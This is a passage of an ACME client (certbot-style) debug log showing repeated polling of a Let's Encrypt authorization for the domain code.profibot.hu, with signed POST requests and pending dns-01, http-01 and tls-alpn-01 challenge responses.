23:23:02,542:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:02,543:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:02 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GObI1igtZMJ_7FIg1uSds-71lVyW_wz4rjKUA1PV70tjI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:02,543:DEBUG:acme.client:Storing nonce: LJ8hB_GObI1igtZMJ_7FIg1uSds-71lVyW_wz4rjKUA1PV70tjI +2026-01-19 23:23:02,544:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:05,545:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:05,549:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT2JJMWlndFpNSl83RklnMXVTZHMtNzFsVnlXX3d6NHJqS1VBMVBWNzB0akkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "hrcvIb-ySSzFksGWUhynvhOcKcQwS_Zh_DFJfrOTC5jfjC-PVmSMpvCC-mRCa6NMOV96DyGbgyz5IzyHCD9yzvjkRDPK9a0Oop0dsJiJ5Ixm69TIrlRu5p9IYfTGuAKGfvfMFC9BpRCdS5mG6F1-apbpoT8vfwaJH0r-lj0A8Y0MPR1o-2hDl-0XYqvuB_J2ZWodst3zQ_cjd_mAn4cB5HBdfOdqjWWLQGqWtbXDHn2eIkKSbVx1lKTmzx3vqwmoxrIatVZYOulxqwhxPl-SlMY9ESKJzob3sN9nqQk0xMZUUIeyv6v5-6CMTmwPASBFLkPuMXzOKNYdgKsk9GsnTw", + "payload": "" +} +2026-01-19 23:23:05,699:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:05,700:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:05 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QySeySzz8V3vTQFdlNZY2jZrrzCJvwlSvnk9HqpgJZO6M +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:05,700:DEBUG:acme.client:Storing nonce: H6cLU6QySeySzz8V3vTQFdlNZY2jZrrzCJvwlSvnk9HqpgJZO6M +2026-01-19 23:23:05,701:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:08,701:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:08,705:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReVNleVN6ejhWM3ZUUUZkbE5aWTJqWnJyekNKdndsU3ZuazlIcXBnSlpPNk0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "RkGvG5Ru0ylhGeieJyy8m4LokD6OZWkAGRQ5pgiz4tADQ-prBpp7v7msDlL9jInOKBRlJjpW4uHj_qVOhn66jh730Kv3ikWjScOjDqZq0pZo5wQtxYKvdB1S0kPH0EzfzKISf5i0Gk4zXpPmlzJLUjAf1DSpZEdjg6j9e_gAkGqTGc0Bmu1EPfuuTCsEanmrLz3b21U5w5jQHPxtrJhQrxPJnwRupoB7tDJsbjF03VI325_2PCrzGomyxLM2vTNBtfYsJohIUgcvHtjq3S_PORkQO1cxaHNJnxizypaKzkbgm0v2b1yoLH6-EAvINRrXmEUug7gCfupWHXJHw09XGw", + "payload": "" +} +2026-01-19 23:23:08,863:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:08,863:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:08 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyW_h1dEOCzSRDzGsj3RAO2h4LeVqE-xQJF6xQrczS6OY +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:08,863:DEBUG:acme.client:Storing nonce: H6cLU6QyW_h1dEOCzSRDzGsj3RAO2h4LeVqE-xQJF6xQrczS6OY +2026-01-19 23:23:08,864:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:11,864:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:11,868:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReVdfaDFkRU9DelNSRHpHc2ozUkFPMmg0TGVWcUUteFFKRjZ4UXJjelM2T1kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "NTl09pUUkz6akrlQF0ZyRNGvToXO-KLGBm3l7bzUlnpmm8yVfwOXQ8LuzE1D7Er2urgBgGWbfqcBmdKmFpFWgio9d3M3AzpiiCAeB2e1pI-oU2idVLTsifuHT4y9P0ABT-UE_p4zv9i93-G-DMObBrMU5ppuWNr7d8KuSfC2AjdVUm5IYGmAJXaINSSCl_CQoSDxFYn-FTxVsXZ_tCNMuq39goAk3LLTuG5-7ZzWi8z5um8nN8n51EqlByd9IWLFiX38bfcUsvMJ9ztM3PVmk0JxFaEeNZHAArk0NSFE7EaVoe8EHVw6ym48bsu6VL4MrZoP2IvuzwQKCMGzeq7xlQ", + "payload": "" +} +2026-01-19 23:23:12,026:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:12,027:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:11 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOt8vKjcAh9omXzSu-BapGXoWeLONnc0XfOXO5UDd6jAw +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:12,027:DEBUG:acme.client:Storing nonce: LJ8hB_GOt8vKjcAh9omXzSu-BapGXoWeLONnc0XfOXO5UDd6jAw +2026-01-19 23:23:12,028:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:15,029:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:15,032:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT3Q4dktqY0FoOW9tWHpTdS1CYXBHWG9XZUxPTm5jMFhmT1hPNVVEZDZqQXciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "M8OwZONoJqkekHm0nfgPrDSOsAALTlkfON-VZTxSlg2aZaaRVAVVWvQkpvZX7bRrlwLSnZ_JW3t7HFUWhjxiW-ivCzskyRP0J1Q2mdTVdAcy0dOlh8Bzokg5RBAaw4E-FmdOfH-3KBT4JcYhyo3vKRV-ocLFFGEuZathaMkyVlPbDZG8d24YAHbIlHlH9EC0vlWj18lWKVLSEr8poHOIWQOGJUFhY-GsLJUnf-Ic6GuUidDcAsiiplkw6pBlHi-A4sUbugf3s6XuYuSFHoFbrJatovn8feRUUpLfBjTnlqQFlTBSjbcuIklP0xmpL_gjeJcCxF6mOWDyxqO305rGiQ", + "payload": "" +} +2026-01-19 23:23:15,188:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:15,189:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:15 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOXfoJRc4k1Vvmgm4ROqU3tInRLq8fQPLkweKHYu07hgE +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:15,189:DEBUG:acme.client:Storing nonce: LJ8hB_GOXfoJRc4k1Vvmgm4ROqU3tInRLq8fQPLkweKHYu07hgE +2026-01-19 23:23:15,190:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:18,191:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:18,195:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJMSjhoQl9HT1hmb0pSYzRrMVZ2bWdtNFJPcVUzdEluUkxxOGZRUExrd2VLSFl1MDdoZ0UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "BkE_W8B4A0kE5JzRFw1JoAC0AdiUafXUyffXFrn222efXG13jYlpk0bmOweFoKJ6IIZfrOUfAvOFHCTOlVOgQZkr_lFopBOfcJv0W8m1aXF0YPWrArFzgt1XLjTCp7aD8YskJeNisMWl5Cq455KNRK7PsV1z5vSpR0IZ5F5sj66sL8h8j-3xCCo722tzG9C2br7Gx3tl_flhF48XGc9OkD3q9ANj7yaMlwtRh1fX_nHEW9IRkAGXiSFT7PKwHy2FUXcR4qx3YuT0uLy-gISjokpUHmX1Les_IiCaylAKZel3XmL__9FL-14OvVyee628JznRkB2aSYYOZy8cndfAlQ", + "payload": "" +} +2026-01-19 23:23:18,340:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:18,341:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:18 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QymYuaBdieHs3XILzl9xtNDizdJFGnBg1Lebl9rrLQc34 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:18,342:DEBUG:acme.client:Storing nonce: H6cLU6QymYuaBdieHs3XILzl9xtNDizdJFGnBg1Lebl9rrLQc34 +2026-01-19 23:23:18,342:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:21,343:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:21,347:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReW1ZdWFCZGllSHMzWElMemw5eHRORGl6ZEpGR25CZzFMZWJsOXJyTFFjMzQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "Vbxuir7oygxmxVUIS-RrNmdjaJEZCmGM2Mpv9jBeERukJCRk2D_CHBmegqlKH2p_wEkmPi0gxV3a2uE6bDlX-3OQzbxnwyLjJfM4w4Ie8Cz5gM4oBF5-AXiknNIB4XY5bXX9WekzeBE2mkcCbkZdHjrqNL9uLDQa8eyrw--Zmx51XRuB-Nz4quO7cKCs8opTGJEuXYoQsVhvBz7vbsGCElh4mUW5PwLko-X6TcUZxwnS9nZJ9aMHmnmaRPox7AEbt9Bp7gaUEn8MBfKzIDGEMq8wvjP6ailpSOukDaio_DH_d5_bohTYUDKOWU2VM3zVO3x5fqIYqBVSeziqZZ4eZQ", + "payload": "" +} +2026-01-19 23:23:21,493:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:21,494:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:21 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyJp8VcLIvhIsITla8nFLdCwacdTJfMSU2m2qWjLWMSa4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:21,494:DEBUG:acme.client:Storing nonce: H6cLU6QyJp8VcLIvhIsITla8nFLdCwacdTJfMSU2m2qWjLWMSa4 +2026-01-19 23:23:21,495:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:24,496:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:24,499:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReUpwOFZjTEl2aElzSVRsYThuRkxkQ3dhY2RUSmZNU1UybTJxV2pMV01TYTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "aNsVUx-awrkwnVX3yR96B0pvCE6Wa0B4VX3LTDVrP6Gbq0HzA7iDw3KN0NjrGtwVeWBuOoXOusqplPjIjtsFW8ss9zWb15TjP2MpHVlN11r8lG4j22FGgJPepCVrDc5vwsfoXqihG8GdijdP8Luf6orF6uw_gCd929aWN12HMKNJD4VsIM-YL6aO17-FdySLmHtyUQ3nbsajmoxohZirRSBaHT7FQHh7tXU-5q7KFhkRwA8cX-ImdxkfZH5NnRFtUrzsD9u9Sj-Nggr0iFrGnZbxwkJJ-WIoTjukbh7eD_EkME7iR9zx7f7y-Gt3euDBM__clUyS43IUuJW04tQ9JA", + "payload": "" +} +2026-01-19 23:23:24,647:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:24,648:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:24 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: H6cLU6QyqsiJvfaiNPRUtQ-RCNbZBo0kZNgoe0_qVPLgbRd1Y-U +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:24,648:DEBUG:acme.client:Storing nonce: H6cLU6QyqsiJvfaiNPRUtQ-RCNbZBo0kZNgoe0_qVPLgbRd1Y-U +2026-01-19 23:23:24,649:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ', 'status': 'pending', 'token': 'OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk'} +2026-01-19 23:23:27,650:DEBUG:acme.client:JWS payload: +b'' +2026-01-19 23:23:27,654:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/645727310096: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJINmNMVTZReXFzaUp2ZmFpTlBSVXRRLVJDTmJaQm8wa1pOZ29lMF9xVlBMZ2JSZDFZLVUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ1NzI3MzEwMDk2In0", + "signature": "iDVMN3VhdyTVwLgq-8OP2eV19Tj3S--16MNZ4Knp2U-6hLnHAs3uUNMa5aHtX7yqdahzmtAMtTwt5Ca0sOPdHrMzQhmezwmx6oUMXIKNT8aK3CN0cSoOU_HEgj54j39r5iTMIwYGInZaUBla4bJ9iEqygx85lVSP7-JxSLF50PEoq1BiczsreSOuinK0eSzKGIsql9BOCxuSkIZOxF851-o64kVAzG0HVJR-VzznPJVnpNFt5gcVyXn30-bNZ8sa54JXDRnUsTdAQBwFm6jk3l8K5Ca-7KMUwVb9CDSkYMcxNDrf4-Yr2sJ_hXNDjyQ3Z8QoeVXNGsHMa94IdgN6_w", + "payload": "" +} +2026-01-19 23:23:27,799:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/645727310096 HTTP/1.1" 200 824 +2026-01-19 23:23:27,800:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Mon, 19 Jan 2026 23:23:27 GMT +Content-Type: application/json +Content-Length: 824 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: LJ8hB_GOzspeHKYpVZFDfDE2qSxPun8M0ef-9fG9v3jLhZl9o5w +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "code.profibot.hu" + }, + "status": "pending", + "expires": "2026-01-26T23:22:57Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/GGgtbQ", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/4gVIFA", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/645727310096/UdlK3A", + "status": "pending", + "token": "OY8EgzG_DxGczkjfmz7irLUy93iKkgNOuZAzNEr7tWk" + } + ] +} +2026-01-19 23:23:27,801:DEBUG:acme.client:Storing nonce: LJ8hB_GOzspeHKYpVZFDfDE2qSxPun8M0ef-9fG9v3jLhZl9o5w +2026-01-19 23:23:27,801:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 